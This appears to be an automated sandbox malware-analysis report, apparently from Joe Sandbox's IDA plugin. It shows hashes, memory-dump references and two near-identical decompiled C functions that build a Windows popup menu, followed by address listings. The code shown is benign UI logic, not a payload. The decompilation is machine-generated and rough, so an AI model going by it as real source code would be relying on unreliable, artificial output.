                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Window$Rect$LongMessageSend$Invalidate
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1214947677-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 2da4701ce2bd41fc5081b760d652fd595df9767af16d47abbeebc4c3cdbdf4d2
                                                                                                                                                                                                                                                                                          • Instruction ID: 0d429e7a7e2fbe65cdc38931eecf04cd01d10727fccb8094d738399840d23239
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2da4701ce2bd41fc5081b760d652fd595df9767af16d47abbeebc4c3cdbdf4d2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40311070A00709AFDB54DFA9CD89BAEB7F4AF0C710F10861AA515E7690DB70E980CB94
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                                                                                                                          			E00100147() {
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed char _t83;
                                                                                                                                                                                                                                                                                          				int _t90;
                                                                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                                                                          				void* _t107;
                                                                                                                                                                                                                                                                                          				signed char _t110;
                                                                                                                                                                                                                                                                                          				void* _t118;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t134;
                                                                                                                                                                                                                                                                                          				void* _t135;
                                                                                                                                                                                                                                                                                          				void* _t136;
                                                                                                                                                                                                                                                                                          				int _t137;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t138;
                                                                                                                                                                                                                                                                                          				void* _t139;
                                                                                                                                                                                                                                                                                          				void* _t140;
                                                                                                                                                                                                                                                                                          				CHAR* _t141;
                                                                                                                                                                                                                                                                                          				signed int _t142;
                                                                                                                                                                                                                                                                                          				void* _t145;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                                                                                          					 *(_t142 - 0xe4) = 0;
                                                                                                                                                                                                                                                                                          					 *(_t142 - 0xe0) = 0;
                                                                                                                                                                                                                                                                                          					 *(_t142 - 0xdc) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t142 - 0xd8)) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t142 - 0xd4)) = 0;
                                                                                                                                                                                                                                                                                          					SendMessageA(_t134, 0x417, _t137, _t142 - 0xe4);
                                                                                                                                                                                                                                                                                          					if(( *(_t142 - 0xdc) & 0x00000008) == 0) {
                                                                                                                                                                                                                                                                                          						 *(_t142 - 0xf4) = 0;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t142 - 0xf0)) = 0;
                                                                                                                                                                                                                                                                                          						 *(_t142 - 0xec) = 0;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t142 - 0xe8)) = 0;
                                                                                                                                                                                                                                                                                          						SendMessageA(_t134, 0x41d, _t137, _t142 - 0xf4);
                                                                                                                                                                                                                                                                                          						_t83 =  *(_t142 - 0xdc);
                                                                                                                                                                                                                                                                                          						_t127 =  *(_t142 - 0xec);
                                                                                                                                                                                                                                                                                          						_t110 = _t83 >> 0x00000002 & 0x00000001;
                                                                                                                                                                                                                                                                                          						if( *(_t142 - 0xec) >  *((intOrPtr*)(_t142 - 0xfc))) {
                                                                                                                                                                                                                                                                                          							if((_t83 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                          								_push(0xc7);
                                                                                                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                                                                                                          								 *(_t142 - 0xd0) = 0;
                                                                                                                                                                                                                                                                                          								_push(_t142 - 0xcf);
                                                                                                                                                                                                                                                                                          								if(( *(_t142 - 0x110))[2] == 0) {
                                                                                                                                                                                                                                                                                          									E00106820();
                                                                                                                                                                                                                                                                                          									_t145 = _t145 + 0xc;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t142 - 0x134)) = 0;
                                                                                                                                                                                                                                                                                          									 *(_t142 - 0x120) = 0;
                                                                                                                                                                                                                                                                                          									 *(_t142 - 0x11c) = 0;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t142 - 0x130)) = 0;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t142 - 0x12c)) = 0;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t142 - 0x128)) = 0;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t142 - 0x124)) = 0;
                                                                                                                                                                                                                                                                                          									_t141 = _t142 - 0xd0;
                                                                                                                                                                                                                                                                                          									 *(_t142 - 0x138) = 0x20;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t142 - 0x134)) = 2;
                                                                                                                                                                                                                                                                                          									 *(_t142 - 0x120) = _t141;
                                                                                                                                                                                                                                                                                          									 *(_t142 - 0x11c) = 0xc8;
                                                                                                                                                                                                                                                                                          									if(SendMessageA(_t134, 0x441,  *(_t142 - 0xe0), _t142 - 0x138) == 0xffffffff || lstrlenA(_t141) == 0) {
                                                                                                                                                                                                                                                                                          										_t141 = 0x11293e;
                                                                                                                                                                                                                                                                                          										_t90 = LoadStringA( *0x170c0c,  *(_t142 - 0xe0), _t142 - 0xd0, 0xc8);
                                                                                                                                                                                                                                                                                          										_t118 = 0;
                                                                                                                                                                                                                                                                                          										if(_t90 > 0) {
                                                                                                                                                                                                                                                                                          											while( *((char*)(_t142 + _t118 - 0xd0)) != 0xa) {
                                                                                                                                                                                                                                                                                          												_t118 = _t118 + 1;
                                                                                                                                                                                                                                                                                          												if(_t118 < _t90) {
                                                                                                                                                                                                                                                                                          													continue;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												goto L18;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											_t141 = _t142 + _t118 - 0xcf;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									L18:
                                                                                                                                                                                                                                                                                          									_t127 =  *(_t142 - 0xe0);
                                                                                                                                                                                                                                                                                          									AppendMenuA( *(_t142 - 0x108), 0 | _t110 == 0x00000000,  *(_t142 - 0xe0), _t141);
                                                                                                                                                                                                                                                                                          									_t137 =  *(_t142 - 0x10c);
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									E00106820();
                                                                                                                                                                                                                                                                                          									E00106820(_t142 - 0x168, 0, 0x30);
                                                                                                                                                                                                                                                                                          									_t145 = _t145 + 0x18;
                                                                                                                                                                                                                                                                                          									 *(_t142 - 0x168) = 0x30;
                                                                                                                                                                                                                                                                                          									if(E000F4890(_t110, _t134, _t137) != 0) {
                                                                                                                                                                                                                                                                                          										 *(_t142 - 0x168) = 0x2c;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t142 - 0x164)) = 0x14;
                                                                                                                                                                                                                                                                                          									 *(_t142 - 0x144) = _t142 - 0xd0;
                                                                                                                                                                                                                                                                                          									 *(_t142 - 0x140) = 0xc8;
                                                                                                                                                                                                                                                                                          									GetMenuItemInfoA( *(_t142 - 0x118), _t137, 1, _t142 - 0x168);
                                                                                                                                                                                                                                                                                          									_t127 =  *(_t142 - 0x108);
                                                                                                                                                                                                                                                                                          									AppendMenuA( *(_t142 - 0x108), 0 | _t110 == 0x00000000 | 0x00000010,  *(_t142 - 0x154),  *(_t142 - 0x144));
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								if(GetMenuItemCount( *(_t142 - 0x108)) > 0) {
                                                                                                                                                                                                                                                                                          									AppendMenuA( *(_t142 - 0x108), 0x800, 0, 0);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t137 = _t137 + 1;
                                                                                                                                                                                                                                                                                          					 *(_t142 - 0x10c) = _t137;
                                                                                                                                                                                                                                                                                          				} while (_t137 <  *((intOrPtr*)(_t142 - 0x114)));
                                                                                                                                                                                                                                                                                          				_t138 =  *(_t142 - 0x108);
                                                                                                                                                                                                                                                                                          				if(GetMenuItemCount(_t138) != 0) {
                                                                                                                                                                                                                                                                                          					_pop(_t135);
                                                                                                                                                                                                                                                                                          					 *( *(_t142 - 0x110)) = _t138;
                                                                                                                                                                                                                                                                                          					_pop(_t139);
                                                                                                                                                                                                                                                                                          					_pop(_t106);
                                                                                                                                                                                                                                                                                          					return E001059E6(1, _t106,  *(_t142 - 4) ^ _t142,  *(_t142 - 0x110), _t135, _t139);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					if(_t138 != 0) {
                                                                                                                                                                                                                                                                                          						DestroyMenu(_t138);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                                                                          					_pop(_t136);
                                                                                                                                                                                                                                                                                          					_pop(_t140);
                                                                                                                                                                                                                                                                                          					_pop(_t107);
                                                                                                                                                                                                                                                                                          					return E001059E6(0, _t107,  *(_t142 - 4) ^ _t142, _t127, _t136, _t140);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                                                                                          0x00100150
                                                                                                                                                                                                                                                                                          0x00100158
                                                                                                                                                                                                                                                                                          0x0010015e
                                                                                                                                                                                                                                                                                          0x00100164
                                                                                                                                                                                                                                                                                          0x0010016a
                                                                                                                                                                                                                                                                                          0x00100170
                                                                                                                                                                                                                                                                                          0x00100184
                                                                                                                                                                                                                                                                                          0x0010018d
                                                                                                                                                                                                                                                                                          0x001001a3
                                                                                                                                                                                                                                                                                          0x001001a9
                                                                                                                                                                                                                                                                                          0x001001af
                                                                                                                                                                                                                                                                                          0x001001b5
                                                                                                                                                                                                                                                                                          0x001001bb
                                                                                                                                                                                                                                                                                          0x001001bd
                                                                                                                                                                                                                                                                                          0x001001c3
                                                                                                                                                                                                                                                                                          0x001001ce
                                                                                                                                                                                                                                                                                          0x001001d7
                                                                                                                                                                                                                                                                                          0x001001e0
                                                                                                                                                                                                                                                                                          0x0010021c
                                                                                                                                                                                                                                                                                          0x00100227
                                                                                                                                                                                                                                                                                          0x00100229
                                                                                                                                                                                                                                                                                          0x00100230
                                                                                                                                                                                                                                                                                          0x00100231
                                                                                                                                                                                                                                                                                          0x001002ce
                                                                                                                                                                                                                                                                                          0x001002d5
                                                                                                                                                                                                                                                                                          0x001002d8
                                                                                                                                                                                                                                                                                          0x001002de
                                                                                                                                                                                                                                                                                          0x001002e4
                                                                                                                                                                                                                                                                                          0x001002f1
                                                                                                                                                                                                                                                                                          0x001002f7
                                                                                                                                                                                                                                                                                          0x001002fd
                                                                                                                                                                                                                                                                                          0x00100303
                                                                                                                                                                                                                                                                                          0x00100310
                                                                                                                                                                                                                                                                                          0x0010031e
                                                                                                                                                                                                                                                                                          0x00100328
                                                                                                                                                                                                                                                                                          0x00100332
                                                                                                                                                                                                                                                                                          0x00100338
                                                                                                                                                                                                                                                                                          0x0010034b
                                                                                                                                                                                                                                                                                          0x00100374
                                                                                                                                                                                                                                                                                          0x00100379
                                                                                                                                                                                                                                                                                          0x0010037f
                                                                                                                                                                                                                                                                                          0x00100383
                                                                                                                                                                                                                                                                                          0x00100385
                                                                                                                                                                                                                                                                                          0x0010038f
                                                                                                                                                                                                                                                                                          0x00100392
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00100394
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00100392
                                                                                                                                                                                                                                                                                          0x00100396
                                                                                                                                                                                                                                                                                          0x00100396
                                                                                                                                                                                                                                                                                          0x00100383
                                                                                                                                                                                                                                                                                          0x0010039d
                                                                                                                                                                                                                                                                                          0x0010039d
                                                                                                                                                                                                                                                                                          0x001003b4
                                                                                                                                                                                                                                                                                          0x001003ba
                                                                                                                                                                                                                                                                                          0x00100237
                                                                                                                                                                                                                                                                                          0x00100237
                                                                                                                                                                                                                                                                                          0x00100247
                                                                                                                                                                                                                                                                                          0x0010024c
                                                                                                                                                                                                                                                                                          0x0010024f
                                                                                                                                                                                                                                                                                          0x00100260
                                                                                                                                                                                                                                                                                          0x00100262
                                                                                                                                                                                                                                                                                          0x00100262
                                                                                                                                                                                                                                                                                          0x00100283
                                                                                                                                                                                                                                                                                          0x0010028d
                                                                                                                                                                                                                                                                                          0x00100293
                                                                                                                                                                                                                                                                                          0x0010029d
                                                                                                                                                                                                                                                                                          0x001002b7
                                                                                                                                                                                                                                                                                          0x001002c3
                                                                                                                                                                                                                                                                                          0x001002c3
                                                                                                                                                                                                                                                                                          0x001001e2
                                                                                                                                                                                                                                                                                          0x001001f1
                                                                                                                                                                                                                                                                                          0x00100207
                                                                                                                                                                                                                                                                                          0x00100207
                                                                                                                                                                                                                                                                                          0x001001f1
                                                                                                                                                                                                                                                                                          0x001001e0
                                                                                                                                                                                                                                                                                          0x001001d7
                                                                                                                                                                                                                                                                                          0x001003c0
                                                                                                                                                                                                                                                                                          0x001003c1
                                                                                                                                                                                                                                                                                          0x001003c7
                                                                                                                                                                                                                                                                                          0x001003d3
                                                                                                                                                                                                                                                                                          0x001003e2
                                                                                                                                                                                                                                                                                          0x00100413
                                                                                                                                                                                                                                                                                          0x00100414
                                                                                                                                                                                                                                                                                          0x00100416
                                                                                                                                                                                                                                                                                          0x0010041b
                                                                                                                                                                                                                                                                                          0x00100424
                                                                                                                                                                                                                                                                                          0x001003e4
                                                                                                                                                                                                                                                                                          0x001003e6
                                                                                                                                                                                                                                                                                          0x001003e9
                                                                                                                                                                                                                                                                                          0x001003e9
                                                                                                                                                                                                                                                                                          0x001003f1
                                                                                                                                                                                                                                                                                          0x001003f9
                                                                                                                                                                                                                                                                                          0x001003fa
                                                                                                                                                                                                                                                                                          0x001003fb
                                                                                                                                                                                                                                                                                          0x00100409
                                                                                                                                                                                                                                                                                          0x00100409

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Menu$ItemMessage$AppendCountSend_memset$BeepDestroyInfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2301784159-0
                                                                                                                                                                                                                                                                                          • Opcode ID: e70a323967763573e164107f95d3bc1f50f1a19a2bccb09d7da94945c001d4e6
                                                                                                                                                                                                                                                                                          • Instruction ID: 6681bbd65ee12f4bd92cf201b60c0e14eb0bec19a48bc5f63d7839aa31f723b1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e70a323967763573e164107f95d3bc1f50f1a19a2bccb09d7da94945c001d4e6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC213970E012699FDB66CB64CD45BDEB7B4BB1C300F0081EAA549E6180D7B05EC08F60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                                                                                                                          			E00100149() {
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed char _t83;
                                                                                                                                                                                                                                                                                          				int _t90;
                                                                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                                                                          				void* _t107;
                                                                                                                                                                                                                                                                                          				signed char _t110;
                                                                                                                                                                                                                                                                                          				void* _t118;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t134;
                                                                                                                                                                                                                                                                                          				void* _t135;
                                                                                                                                                                                                                                                                                          				void* _t136;
                                                                                                                                                                                                                                                                                          				int _t137;
                                                                                                                                                                                                                                                                                          				int _t138;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t139;
                                                                                                                                                                                                                                                                                          				void* _t140;
                                                                                                                                                                                                                                                                                          				void* _t141;
                                                                                                                                                                                                                                                                                          				CHAR* _t142;
                                                                                                                                                                                                                                                                                          				signed int _t143;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                                                                                          					 *(_t143 - 0xe4) = 0;
                                                                                                                                                                                                                                                                                          					 *(_t143 - 0xe0) = 0;
                                                                                                                                                                                                                                                                                          					 *(_t143 - 0xdc) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t143 - 0xd8)) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t143 - 0xd4)) = 0;
                                                                                                                                                                                                                                                                                          					SendMessageA(_t134, 0x417, _t137, _t143 - 0xe4);
                                                                                                                                                                                                                                                                                          					if(( *(_t143 - 0xdc) & 0x00000008) == 0) {
                                                                                                                                                                                                                                                                                          						 *(_t143 - 0xf4) = 0;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t143 - 0xf0)) = 0;
                                                                                                                                                                                                                                                                                          						 *(_t143 - 0xec) = 0;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t143 - 0xe8)) = 0;
                                                                                                                                                                                                                                                                                          						SendMessageA(_t134, 0x41d, _t137, _t143 - 0xf4);
                                                                                                                                                                                                                                                                                          						_t83 =  *(_t143 - 0xdc);
                                                                                                                                                                                                                                                                                          						_t127 =  *(_t143 - 0xec);
                                                                                                                                                                                                                                                                                          						_t110 = _t83 >> 0x00000002 & 0x00000001;
                                                                                                                                                                                                                                                                                          						if( *(_t143 - 0xec) >  *((intOrPtr*)(_t143 - 0xfc))) {
                                                                                                                                                                                                                                                                                          							if((_t83 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                          								_push(0xc7);
                                                                                                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                                                                                                          								 *(_t143 - 0xd0) = 0;
                                                                                                                                                                                                                                                                                          								_push(_t143 - 0xcf);
                                                                                                                                                                                                                                                                                          								if(( *(_t143 - 0x110))[2] == 0) {
                                                                                                                                                                                                                                                                                          									E00106820();
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t143 - 0x134)) = 0;
                                                                                                                                                                                                                                                                                          									 *(_t143 - 0x120) = 0;
                                                                                                                                                                                                                                                                                          									 *(_t143 - 0x11c) = 0;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t143 - 0x130)) = 0;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t143 - 0x12c)) = 0;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t143 - 0x128)) = 0;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t143 - 0x124)) = 0;
                                                                                                                                                                                                                                                                                          									_t142 = _t143 - 0xd0;
                                                                                                                                                                                                                                                                                          									 *(_t143 - 0x138) = 0x20;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t143 - 0x134)) = 2;
                                                                                                                                                                                                                                                                                          									 *(_t143 - 0x120) = _t142;
                                                                                                                                                                                                                                                                                          									 *(_t143 - 0x11c) = 0xc8;
                                                                                                                                                                                                                                                                                          									if(SendMessageA(_t134, 0x441,  *(_t143 - 0xe0), _t143 - 0x138) == 0xffffffff || lstrlenA(_t142) == 0) {
                                                                                                                                                                                                                                                                                          										_t142 = 0x11293e;
                                                                                                                                                                                                                                                                                          										_t90 = LoadStringA( *0x170c0c,  *(_t143 - 0xe0), _t143 - 0xd0, 0xc8);
                                                                                                                                                                                                                                                                                          										_t118 = 0;
                                                                                                                                                                                                                                                                                          										if(_t90 > 0) {
                                                                                                                                                                                                                                                                                          											while( *((char*)(_t143 + _t118 - 0xd0)) != 0xa) {
                                                                                                                                                                                                                                                                                          												_t118 = _t118 + 1;
                                                                                                                                                                                                                                                                                          												if(_t118 < _t90) {
                                                                                                                                                                                                                                                                                          													continue;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												goto L18;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											_t142 = _t143 + _t118 - 0xcf;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									L18:
                                                                                                                                                                                                                                                                                          									_t127 =  *(_t143 - 0xe0);
                                                                                                                                                                                                                                                                                          									AppendMenuA( *(_t143 - 0x108), 0 | _t110 == 0x00000000,  *(_t143 - 0xe0), _t142);
                                                                                                                                                                                                                                                                                          									_t137 =  *(_t143 - 0x10c);
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									E00106820();
                                                                                                                                                                                                                                                                                          									E00106820(_t143 - 0x168, 0, 0x30);
                                                                                                                                                                                                                                                                                          									 *(_t143 - 0x168) = 0x30;
                                                                                                                                                                                                                                                                                          									if(E000F4890(_t110, _t134, _t137) != 0) {
                                                                                                                                                                                                                                                                                          										 *(_t143 - 0x168) = 0x2c;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t143 - 0x164)) = 0x14;
                                                                                                                                                                                                                                                                                          									 *(_t143 - 0x144) = _t143 - 0xd0;
                                                                                                                                                                                                                                                                                          									 *(_t143 - 0x140) = 0xc8;
                                                                                                                                                                                                                                                                                          									GetMenuItemInfoA( *(_t143 - 0x118), _t137, 1, _t143 - 0x168);
                                                                                                                                                                                                                                                                                          									_t127 =  *(_t143 - 0x108);
                                                                                                                                                                                                                                                                                          									AppendMenuA( *(_t143 - 0x108), 0 | _t110 == 0x00000000 | 0x00000010,  *(_t143 - 0x154),  *(_t143 - 0x144));
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								if(GetMenuItemCount( *(_t143 - 0x108)) > 0) {
                                                                                                                                                                                                                                                                                          									AppendMenuA( *(_t143 - 0x108), 0x800, 0, 0);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t138 = _t137 + 1;
                                                                                                                                                                                                                                                                                          					 *(_t143 - 0x10c) = _t138;
                                                                                                                                                                                                                                                                                          				} while (_t138 <  *((intOrPtr*)(_t143 - 0x114)));
                                                                                                                                                                                                                                                                                          				_t139 =  *(_t143 - 0x108);
                                                                                                                                                                                                                                                                                          				if(GetMenuItemCount(_t139) != 0) {
                                                                                                                                                                                                                                                                                          					_pop(_t135);
                                                                                                                                                                                                                                                                                          					 *( *(_t143 - 0x110)) = _t139;
                                                                                                                                                                                                                                                                                          					_pop(_t140);
                                                                                                                                                                                                                                                                                          					_pop(_t106);
                                                                                                                                                                                                                                                                                          					return E001059E6(1, _t106,  *(_t143 - 4) ^ _t143,  *(_t143 - 0x110), _t135, _t140);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					if(_t139 != 0) {
                                                                                                                                                                                                                                                                                          						DestroyMenu(_t139);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                                                                          					_pop(_t136);
                                                                                                                                                                                                                                                                                          					_pop(_t141);
                                                                                                                                                                                                                                                                                          					_pop(_t107);
                                                                                                                                                                                                                                                                                          					return E001059E6(0, _t107,  *(_t143 - 4) ^ _t143, _t127, _t136, _t141);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                                                                                          0x00100150
                                                                                                                                                                                                                                                                                          0x00100158
                                                                                                                                                                                                                                                                                          0x0010015e
                                                                                                                                                                                                                                                                                          0x00100164
                                                                                                                                                                                                                                                                                          0x0010016a
                                                                                                                                                                                                                                                                                          0x00100170
                                                                                                                                                                                                                                                                                          0x00100184
                                                                                                                                                                                                                                                                                          0x0010018d
                                                                                                                                                                                                                                                                                          0x001001a3
                                                                                                                                                                                                                                                                                          0x001001a9
                                                                                                                                                                                                                                                                                          0x001001af
                                                                                                                                                                                                                                                                                          0x001001b5
                                                                                                                                                                                                                                                                                          0x001001bb
                                                                                                                                                                                                                                                                                          0x001001bd
                                                                                                                                                                                                                                                                                          0x001001c3
                                                                                                                                                                                                                                                                                          0x001001ce
                                                                                                                                                                                                                                                                                          0x001001d7
                                                                                                                                                                                                                                                                                          0x001001e0
                                                                                                                                                                                                                                                                                          0x0010021c
                                                                                                                                                                                                                                                                                          0x00100227
                                                                                                                                                                                                                                                                                          0x00100229
                                                                                                                                                                                                                                                                                          0x00100230
                                                                                                                                                                                                                                                                                          0x00100231
                                                                                                                                                                                                                                                                                          0x001002ce
                                                                                                                                                                                                                                                                                          0x001002d8
                                                                                                                                                                                                                                                                                          0x001002de
                                                                                                                                                                                                                                                                                          0x001002e4
                                                                                                                                                                                                                                                                                          0x001002f1
                                                                                                                                                                                                                                                                                          0x001002f7
                                                                                                                                                                                                                                                                                          0x001002fd
                                                                                                                                                                                                                                                                                          0x00100303
                                                                                                                                                                                                                                                                                          0x00100310
                                                                                                                                                                                                                                                                                          0x0010031e
                                                                                                                                                                                                                                                                                          0x00100328
                                                                                                                                                                                                                                                                                          0x00100332
                                                                                                                                                                                                                                                                                          0x00100338
                                                                                                                                                                                                                                                                                          0x0010034b
                                                                                                                                                                                                                                                                                          0x00100374
                                                                                                                                                                                                                                                                                          0x00100379
                                                                                                                                                                                                                                                                                          0x0010037f
                                                                                                                                                                                                                                                                                          0x00100383
                                                                                                                                                                                                                                                                                          0x00100385
                                                                                                                                                                                                                                                                                          0x0010038f
                                                                                                                                                                                                                                                                                          0x00100392
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00100394
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00100392
                                                                                                                                                                                                                                                                                          0x00100396
                                                                                                                                                                                                                                                                                          0x00100396
                                                                                                                                                                                                                                                                                          0x00100383
                                                                                                                                                                                                                                                                                          0x0010039d
                                                                                                                                                                                                                                                                                          0x0010039d
                                                                                                                                                                                                                                                                                          0x001003b4
                                                                                                                                                                                                                                                                                          0x001003ba
                                                                                                                                                                                                                                                                                          0x00100237
                                                                                                                                                                                                                                                                                          0x00100237
                                                                                                                                                                                                                                                                                          0x00100247
                                                                                                                                                                                                                                                                                          0x0010024f
                                                                                                                                                                                                                                                                                          0x00100260
                                                                                                                                                                                                                                                                                          0x00100262
                                                                                                                                                                                                                                                                                          0x00100262
                                                                                                                                                                                                                                                                                          0x00100283
                                                                                                                                                                                                                                                                                          0x0010028d
                                                                                                                                                                                                                                                                                          0x00100293
                                                                                                                                                                                                                                                                                          0x0010029d
                                                                                                                                                                                                                                                                                          0x001002b7
                                                                                                                                                                                                                                                                                          0x001002c3
                                                                                                                                                                                                                                                                                          0x001002c3
                                                                                                                                                                                                                                                                                          0x001001e2
                                                                                                                                                                                                                                                                                          0x001001f1
                                                                                                                                                                                                                                                                                          0x00100207
                                                                                                                                                                                                                                                                                          0x00100207
                                                                                                                                                                                                                                                                                          0x001001f1
                                                                                                                                                                                                                                                                                          0x001001e0
                                                                                                                                                                                                                                                                                          0x001001d7
                                                                                                                                                                                                                                                                                          0x001003c0
                                                                                                                                                                                                                                                                                          0x001003c1
                                                                                                                                                                                                                                                                                          0x001003c7
                                                                                                                                                                                                                                                                                          0x001003d3
                                                                                                                                                                                                                                                                                          0x001003e2
                                                                                                                                                                                                                                                                                          0x00100413
                                                                                                                                                                                                                                                                                          0x00100414
                                                                                                                                                                                                                                                                                          0x00100416
                                                                                                                                                                                                                                                                                          0x0010041b
                                                                                                                                                                                                                                                                                          0x00100424
                                                                                                                                                                                                                                                                                          0x001003e4
                                                                                                                                                                                                                                                                                          0x001003e6
